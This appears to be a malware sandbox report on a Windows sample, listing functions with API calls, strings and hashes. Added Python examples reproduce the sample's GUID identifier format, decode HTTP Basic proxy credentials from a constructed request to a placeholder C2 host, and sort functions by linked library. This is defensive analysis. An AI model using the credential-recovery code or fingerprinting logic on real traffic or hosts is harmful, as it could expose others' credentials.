• String ID: .\crypto\x509v3\v3_ncons.c$excluded$permitted
• API String ID: 909875538-3320112686
• Opcode ID: 195ed9672aaa2648b8ca5620b13c5614befbd895c8db58ae5f0cefb4a69b366a
• Instruction ID: dbaea13cd6a2245a6be3c7912fa85323d76425108e49ca5c6abca80130d37a42
• Opcode Fuzzy Hash: 195ed9672aaa2648b8ca5620b13c5614befbd895c8db58ae5f0cefb4a69b366a
• Instruction Fuzzy Hash: 08411AB17403016BF720EA669C82F577385AB44708F44483FF94996383F67DD909876A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004026E8: __EH_prolog.LIBCMT ref: 004026ED
  • Part of subcall function 004026E8: lstrlenW.KERNEL32(?,00000000), ref: 00402710
  • Part of subcall function 004026E8: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0040272B
• lstrcmpiW.KERNEL32(?,>%@,00000000,00000000,?,?,0040253E,?), ref: 0040262D
• CoTaskMemFree.OLE32(>%@,>%@,00000000,00000000,?,?,0040253E,?), ref: 004026D9
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: FreeTask$H_prologlstrcmpilstrlen
• String ID: >%@$>%@${
• API String ID: 3556687524-2785201340
• Opcode ID: 3a1eed4ea550ab0979526d03e14cf500c39b41bd9c10dafbe3e61bb5488a0f39
• Instruction ID: cb22fa682044a0b8a455233af29240ddf0acd2e84249e8b2828f6101798ec0e9
• Opcode Fuzzy Hash: 3a1eed4ea550ab0979526d03e14cf500c39b41bd9c10dafbe3e61bb5488a0f39
• Instruction Fuzzy Hash: 0E319930B00318ABDB119F95C9C8A9D77B9FB44744F20487BE145B72D1D6FA5E81DB18
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004B863D: SetLastError.KERNEL32(0000273F,004B441F,00000002,004B4633,?,?,?,004B4633,?), ref: 004B864A
• _memset.LIBCMT ref: 004AC09F
• __fprintf_l.LIBCMT ref: 004AC0C2
Strings
• init_resolve_thread() failed for %s; %s, xrefs: 004AC0F4
• getaddrinfo() failed for %s:%d; %s, xrefs: 004AC12B
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast__fprintf_l_memset
• String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
• API String ID: 3958027077-1389973398
• Opcode ID: e2c89a2ed61aa86c23c5d24d00d97f05644d7580ee717e291fa7fe5426da74f3
• Instruction ID: ecc0e3a67e87ea64e040c5bc6ba58bd30de5112e6adb10467326ce3e6e4e1ea2
• Opcode Fuzzy Hash: e2c89a2ed61aa86c23c5d24d00d97f05644d7580ee717e291fa7fe5426da74f3
• Instruction Fuzzy Hash: 18312DB1900209ABEB10EF95CC86FFF77BCEB45704F00041ABA05E2142DA79A9159BB9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _fprintf_memset
• String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
• API String ID: 3021507156-3399676524
• Opcode ID: f47943ab7ec7ef0ce9cfbab85241c927c8af33495254575ae37ba5854aa62ee2
• Instruction ID: 12576a1e297fb4387a4174986c52f66acbc2612250227eaf0207ce6f48c3b90a
• Opcode Fuzzy Hash: f47943ab7ec7ef0ce9cfbab85241c927c8af33495254575ae37ba5854aa62ee2
• Instruction Fuzzy Hash: B2216D767003203BD220956A7C42F5B67DD8FC67ECF15491AFA44E7383E669EC0182AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041AEF7
• UuidCreate.RPCRT4(?), ref: 0041AF03
• _memcmp.LIBCMT ref: 0041AF1E
  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
  • Part of subcall function 00494870: __wcslwr_s_l.LIBCMT ref: 0049487A
Strings
• |P, xrefs: 0041AF35
• %08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 0041AF7F
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CreateH_prologUuid__vsnprintf__wcslwr_s_l_memcmp
• String ID: %08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X$|P
• API String ID: 4222741402-841188695
• Opcode ID: fbdb676eec1dd0142f57aacc8eafccdd5437f22481640e0f35ebd4723b190431
• Instruction ID: 8a11516b30457b368084194ec27007a2eb60275358016bcffb795f12a85ef5e8
• Opcode Fuzzy Hash: fbdb676eec1dd0142f57aacc8eafccdd5437f22481640e0f35ebd4723b190431
• Instruction Fuzzy Hash: 6A2141B290405A6ECB51EBE98C05FBFBBFCAF09315F04446AF590E2182D73CD6059769
Uniqueness

Uniqueness Score: -1.00%

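The function above calls UuidCreate() and then renders the result with the format string referenced at 0041AF7F; this is how the sample derives a per-machine identifier. The following is an added example (editor's code, not from the sample or from the sandbox report) that reproduces the formatting from the 16 bytes UuidCreate writes, shows the canonical GUID rendering of the same bytes for contrast, and gives a matcher for identifiers of that shape. The field layout is the standard RPC UUID struct (Data1 u32, Data2 u16, Data3 u16, Data4[8]); the input bytes are constructed.

```python
import re
import struct
import uuid

# Format string recovered from the sample (xref 0041AF7F). The third field is
# printed with "%04x" (lowercase) while every other field is uppercase.
SAMPLE_GUID_FMT = "%08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X"


def format_uuid_like_sample(uuid_bytes: bytes) -> str:
    """Render the 16 bytes UuidCreate() writes the way the sample's sprintf does.

    In the RPC UUID struct, Data1 (u32), Data2 (u16) and Data3 (u16) are native
    little-endian integers and Data4 is 8 raw bytes, so the first three fields
    come out byte-swapped relative to their order in memory.
    """
    if len(uuid_bytes) != 16:
        raise ValueError("a UUID is exactly 16 bytes")
    data1, data2, data3 = struct.unpack("<IHH", uuid_bytes[:8])
    data4 = uuid_bytes[8:]
    return SAMPLE_GUID_FMT % (data1, data2, data3, *data4)


def canonical_guid(uuid_bytes: bytes) -> str:
    """The same bytes as Windows' UuidToString() would render them."""
    return str(uuid.UUID(bytes_le=uuid_bytes))


# 32 contiguous hex digits: 8 upper, 4 upper, 4 lower, 16 upper, not embedded
# in a longer hex run. The lowercase middle group is the detectable quirk; an
# identifier whose Data3 happens to be all digits cannot be told apart from a
# plain uppercase 32-digit hex string.
SAMPLE_ID_RE = re.compile(
    r"(?<![0-9A-Fa-f])[0-9A-F]{8}[0-9A-F]{4}[0-9a-f]{4}[0-9A-F]{16}(?![0-9A-Fa-f])"
)


def find_sample_ids(text: str) -> list[str]:
    """Return every token in text (a request body, a registry export, a log
    line) shaped like the identifier this function emits."""
    return SAMPLE_ID_RE.findall(text)


if __name__ == "__main__":
    # Constructed input: what UuidCreate() might have written.
    raw = bytes.fromhex("785634123412efcd0123456789abcdef")
    print("sample formatting :", format_uuid_like_sample(raw))
    print("canonical GUID    :", canonical_guid(raw))
```

The mixed-case output is worth keeping in mind when hunting: a search for lowercase-only or uppercase-only GUID strings misses it, and a dashed canonical GUID never matches.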
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __fprintf_l_strlen
• String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
• API String ID: 2029578563-2961970465
• Opcode ID: 30344fbb6a2214b3c91a0b6080fcc8f56736a74280bfa550b6a5cac076dadabc
• Instruction ID: 86f84c575a5d8a8a416ec196c639c8038a00268400fd4f475b295cd03a7d790a
• Opcode Fuzzy Hash: 30344fbb6a2214b3c91a0b6080fcc8f56736a74280bfa550b6a5cac076dadabc
• Instruction Fuzzy Hash: B621AE72500209AFDB00DB55CC46EFA77ACEF15314F2004BBF505AB292EB74AA04CB68
Uniqueness

Uniqueness Score: -1.00%

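The three strings in this function ("%s:%s", "%sAuthorization: Basic %s" and "Proxy-") are the pieces libcurl's http_output_basic() combines into an HTTP Basic credential header, which indicates the sample statically links libcurl. Below is an added example (editor's code, not the sample's and not libcurl's) that builds the header the same way and performs the reverse operation an incident responder wants: recovering the user name and password from a captured request. Base64 is encoding, not encryption, so any proxy credentials the sample carries are readable from a plaintext capture. The request text is constructed; the host name is a placeholder.

```python
import base64
import binascii
import re


def basic_auth_header(user: str, password: str, proxy: bool = False) -> str:
    """Combine the format strings the way the function does: "%s:%s" is
    base64-encoded and dropped into "%sAuthorization: Basic %s", the first %s
    being "Proxy-" for a proxy credential and empty otherwise. The scheme has
    no escaping for the colon, so a colon in the user name is not
    representable, while a colon in the password is fine."""
    credentials = f"{user}:{password}".encode("utf-8")
    token = base64.b64encode(credentials).decode("ascii")
    prefix = "Proxy-" if proxy else ""
    return f"{prefix}Authorization: Basic {token}"


# One header per line; the optional "Proxy-" prefix tells origin and proxy
# credentials apart. Header names are case-insensitive.
HEADER_RE = re.compile(
    r"^(Proxy-)?Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE | re.MULTILINE,
)


def recover_basic_credentials(raw_request: str) -> list[tuple[str, str, str]]:
    """Scan a captured HTTP request and return (kind, user, password) for each
    Basic credential found, kind being "proxy" or "origin". Tokens that are not
    valid base64 or decode without a colon are skipped rather than guessed."""
    found = []
    for m in HEADER_RE.finditer(raw_request):
        kind = "proxy" if m.group(1) else "origin"
        try:
            decoded = base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
        except binascii.Error:
            continue
        user, sep, password = decoded.partition(":")
        if not sep:
            continue  # Basic credentials always carry a colon
        found.append((kind, user, password))
    return found


# Constructed request, not from the sandbox trace: what a libcurl-based client
# sends through an authenticating proxy ("user:s3cret" encoded).
SAMPLE_REQUEST = (
    "GET http://c2.example/gate.php HTTP/1.1\r\n"
    "Host: c2.example\r\n"
    "Proxy-Authorization: Basic dXNlcjpzM2NyZXQ=\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(basic_auth_header("user", "s3cret", proxy=True))
    print(recover_basic_credentials(SAMPLE_REQUEST))
```

When reviewing a capture from an infected host, run the recovery over every request, not only the first: libcurl re-sends the header on each request, and a proxy credential in the binary is a useful pivot for attributing other samples.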
APIs
Strings
• necessary data rewind wasn't possible, xrefs: 004BEFCD
• ioctl callback returned error %d, xrefs: 004BEFA5
• the ioctl callback returned %d, xrefs: 004BEF92
• seek callback returned error %d, xrefs: 004BEF67
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _fseek
• String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
• API String ID: 2937370855-2561564945
• Opcode ID: c0e459ed6d2b7e582f60591a48f00e57a49d9160d0a5ae30e75f78581dc297ac
• Instruction ID: 2bfb2b9ef8207ceb783e17234f7e2e16af2170ef2afdf67ed3bc2180ecf2fef6
• Opcode Fuzzy Hash: c0e459ed6d2b7e582f60591a48f00e57a49d9160d0a5ae30e75f78581dc297ac
• Instruction Fuzzy Hash: E0113A72104705BFEB306A668CC1EFB3AD8DB81324F20083FF26981191D76D5D81A67E
Uniqueness

Uniqueness Score: -1.00%

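Several of the functions in this stretch of the report carry strings from statically linked libraries rather than from the sample's own code: the getaddrinfo()/init_resolve_thread() messages, the Basic-auth fragments and the seek/ioctl/rewind messages are libcurl's (lib/asyn-thread.c and lib/http.c), and the PEM pass-phrase messages are OpenSSL's (crypto/pem/pem_lib.c). The added example below (editor's code, not part of the report) parses the report's Similarity fields and labels each function by the library its strings match, so that only unattributed functions (the GUID formatter, the NOHARDDISK system-information routine, the registry lookups) receive reversing time. The fingerprint table is the editor's; the embedded report excerpt is copied from the Similarity lines above.

```python
import re

# Strings that belong to statically linked third-party code. Exact matches
# against a function's String ID list are enough to classify it; a partial
# match would be needed only if the report truncated long strings.
LIBRARY_FINGERPRINTS = {
    "libcurl": {
        "necessary data rewind wasn't possible",
        "seek callback returned error %d",
        "the ioctl callback returned %d",
        "getaddrinfo() failed for %s:%d; %s",
        "init_resolve_thread() failed for %s; %s",
        "%sAuthorization: Basic %s",
    },
    "OpenSSL": {
        "Enter PEM pass phrase:",
        "phrase is too short, needs to be at least %d chars",
    },
}

# "• API String ID" and "• Opcode Fuzzy Hash" do not match: the key must
# directly follow the bullet.
FIELD_RE = re.compile(r"^[ \t]*• (API ID|String ID|Opcode ID): (.*)$", re.MULTILINE)


def parse_similarity_blocks(report_text: str) -> list[dict]:
    """Collect apis, strings and opcode_id per function from the report's
    Similarity sections. String ID joins a function's strings with '$' and
    the report does not escape that character, so a literal '$' inside a
    string would be split; none of the strings here contain one."""
    blocks, current = [], {}
    for m in FIELD_RE.finditer(report_text):
        key, value = m.group(1), m.group(2).strip()
        if key == "API ID":
            if current:
                blocks.append(current)
            current = {"apis": value, "strings": []}
        elif key == "String ID":
            current["strings"] = value.split("$")
        else:
            current["opcode_id"] = value
    if current:
        blocks.append(current)
    return blocks


def triage(report_text: str) -> list[tuple[str, str]]:
    """Label each function by the library its strings come from, or
    'unattributed' when none match; those are the sample's own functions."""
    labelled = []
    for block in parse_similarity_blocks(report_text):
        libs = sorted(lib for lib, frags in LIBRARY_FINGERPRINTS.items()
                      if frags & set(block["strings"]))
        labelled.append((block.get("opcode_id", "?"), "+".join(libs) or "unattributed"))
    return labelled


# Excerpt of the report's own Similarity lines for five of the functions above.
SAMPLE_REPORT = r"""
• API ID: ErrorLast__fprintf_l_memset
• String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
• API String ID: 3958027077-1389973398
• Opcode ID: e2c89a2ed61aa86c23c5d24d00d97f05644d7580ee717e291fa7fe5426da74f3
• API ID: _fprintf_memset
• String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
• API String ID: 3021507156-3399676524
• Opcode ID: f47943ab7ec7ef0ce9cfbab85241c927c8af33495254575ae37ba5854aa62ee2
• API ID: CreateH_prologUuid__vsnprintf__wcslwr_s_l_memcmp
• String ID: %08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X$|P
• API String ID: 4222741402-841188695
• Opcode ID: fbdb676eec1dd0142f57aacc8eafccdd5437f22481640e0f35ebd4723b190431
• API ID: __fprintf_l_strlen
• String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
• API String ID: 2029578563-2961970465
• Opcode ID: 30344fbb6a2214b3c91a0b6080fcc8f56736a74280bfa550b6a5cac076dadabc
• API ID: _fseek
• String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
• API String ID: 2937370855-2561564945
• Opcode ID: c0e459ed6d2b7e582f60591a48f00e57a49d9160d0a5ae30e75f78581dc297ac
"""

if __name__ == "__main__":
    for opcode_id, label in triage(SAMPLE_REPORT):
        print(f"{opcode_id[:16]}  {label}")
```

Run it over the whole report text rather than this excerpt and the unattributed list is the working set for manual analysis; the Opcode ID doubles as the key for looking the function up again in the report.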
APIs
• __EH_prolog.LIBCMT ref: 0041C789
• _memset.LIBCMT ref: 0041C7C9
• _memset.LIBCMT ref: 0041C7E0
  • Part of subcall function 00413EE7: _memset.LIBCMT ref: 00413F18
  • Part of subcall function 00413EE7: GetVersionExW.KERNEL32 ref: 00413F2D
  • Part of subcall function 0040D809: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0040D828
  • Part of subcall function 0040D809: WideCharToMultiByte.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040D851
  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset$ByteCharMultiWide$ErrorFreeH_prologHeapLastVersion___sbh_find_block___sbh_free_block__lock
• String ID: NOHARDDISK$|P
• API String ID: 2881611377-2061113471
• Opcode ID: 689746e5431970e9d0f70b7fca30be038c29d03e46b7a29646e55585183247d5
• Instruction ID: cf3c418279bb831ffae1d8910e738f3479259517e5a74ac437dc2ec25b6d1683
• Opcode Fuzzy Hash: 689746e5431970e9d0f70b7fca30be038c29d03e46b7a29646e55585183247d5
• Instruction Fuzzy Hash: CF213DB6C4125CABCB11EF59DC85ADEBBBCEF18314F1044ABE509A3251DA385F848F94
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C4B7
                                                                                                                                                  • Part of subcall function 0041C2F1: RegCloseKey.ADVAPI32(00000000,00000000,0041C445,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001), ref: 0041C2FB
                                                                                                                                                  • Part of subcall function 0041C2F1: RegOpenKeyW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000), ref: 0041C314
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001), ref: 0041C54A
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000001), ref: 0041C559
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C36D
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 0041C3A2
                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Close$QueryValue$H_prologOpen
• String ID: did$|P
• API String ID: 3691417025-2379887820
• Opcode ID: 0a324e95d7312b4ea8b0aead640806b29595b15ffc86379d7f402faa50bbbbd6
• Instruction ID: daac6cd6e9e80c07107383c163861bd4f2f57223729cb29765de809be769f937
• Opcode Fuzzy Hash: 0a324e95d7312b4ea8b0aead640806b29595b15ffc86379d7f402faa50bbbbd6
• Instruction Fuzzy Hash: B521A531940218ABCB00AF99CC897EEBB75EF44359F10802FB511B7291C7789E84CAA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 004170F2
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 00417102
• _memset.LIBCMT ref: 00417125
• _swprintf.LIBCMT ref: 0041713E
  • Part of subcall function 00494612: __vswprintf_s_l.LIBCMT ref: 00494625
Strings
Similarity
• API ID: Process$CurrentSession__vswprintf_s_l_memset_swprintf
• String ID: $SessionID
• API String ID: 262824962-3287992559
• Opcode ID: 27f7e8675d9d5653065055976ae9f108d721f0c8a0b1ab1248ed994308174bd0
• Instruction ID: 5f36c9fb717402c447217728248e1a4f289adea5c0305cb6386e46845fc18e2b
• Opcode Fuzzy Hash: 27f7e8675d9d5653065055976ae9f108d721f0c8a0b1ab1248ed994308174bd0
• Instruction Fuzzy Hash: 78110871900218BBDB20EB62CC89EEF7B7CAF44344F00046AE505A2161D7B8DA899768
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041C412
  • Part of subcall function 0041C2F1: RegCloseKey.ADVAPI32(00000000,00000000,0041C445,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001), ref: 0041C2FB
  • Part of subcall function 0041C2F1: RegOpenKeyW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000), ref: 0041C314
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001,00000001), ref: 0041C48C
• RegCloseKey.ADVAPI32(00000000,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001,00000001,77E2EB70), ref: 0041C49B
  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C36D
  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 0041C3A2
Strings
Similarity
• API ID: Close$QueryValue$H_prologOpen
• String ID: guid$|P
• API String ID: 3691417025-14221615
• Opcode ID: 7d04ad43afead76f8eac61f9252d88c70b57a170bcf7a3bad00afd7295edc9d5
• Instruction ID: 72c63756efee89f392cd083e3615c8601cd1656d6be207132b74f334aa7987e2
• Opcode Fuzzy Hash: 7d04ad43afead76f8eac61f9252d88c70b57a170bcf7a3bad00afd7295edc9d5
• Instruction Fuzzy Hash: EB118671940214ABCB119F95DC85BFEB774EF44355F10C02FB815B6251C7788E80CAA8
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _memset$H_prolog_strlen
• String ID: NONECPU$|P
• API String ID: 4197362399-4019201197
• Opcode ID: 1e0c9cbd9c8bbe13f8101ffcf35ba8e8014e5f28474b5afd6a90b09dd770dcff
• Instruction ID: 7f2005befaffd6045799e5009f2cf3ab0c2c9903552300eba690e76bf77329b5
• Opcode Fuzzy Hash: 1e0c9cbd9c8bbe13f8101ffcf35ba8e8014e5f28474b5afd6a90b09dd770dcff
• Instruction Fuzzy Hash: A01127B190011CABDB10EF59D986ADEB7BCEF05748F5004AEA114A3242D6789F848BA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000004,kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90},00000000,00401728), ref: 00401053
• GetLastError.KERNEL32 ref: 0040106A
• MapViewOfFileEx.KERNEL32(?,000F001F,00000000,00000000,?,00000000), ref: 00401094
• CloseHandle.KERNEL32(?), ref: 004010AA
Strings
• kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90}, xrefs: 00401043
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID: kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90}
• API String ID: 1661045500-2019610213
• Opcode ID: 7938225936d7c4eaad28e3493393e00ac30c41ea797ecafcd04c130a4a125ce6
• Instruction ID: 4534d90bf142621e11afcdd47ef8dd24a13c549bc5f85d9ed2eea65f47a5bb1d
• Opcode Fuzzy Hash: 7938225936d7c4eaad28e3493393e00ac30c41ea797ecafcd04c130a4a125ce6
• Instruction Fuzzy Hash: D301D6B16007419FD7304F3AEC08D27BEF9EBC1B113248A3EF296D2AA5DB359481D625
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004124B5
  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 0041251C
  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(00000000,004123A0,00000000,004123A0,00000000,?,00000000,?,004123A0,?), ref: 00411373
  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000001,00000000,?,?,?), ref: 004113A8
  • Part of subcall function 00411460: __EH_prolog.LIBCMT ref: 00411465
Strings
• InstallLocation, xrefs: 004124F4
• SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360, xrefs: 004124DF
• |P, xrefs: 004124C7
Similarity
• API ID: CloseH_prologQueryValue$Open
• String ID: InstallLocation$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360$|P
• API String ID: 2132191456-2110655369
• Opcode ID: 2421d9b0af766796b78481f562871010e4be39d0225d3ac369f90baab30e3769
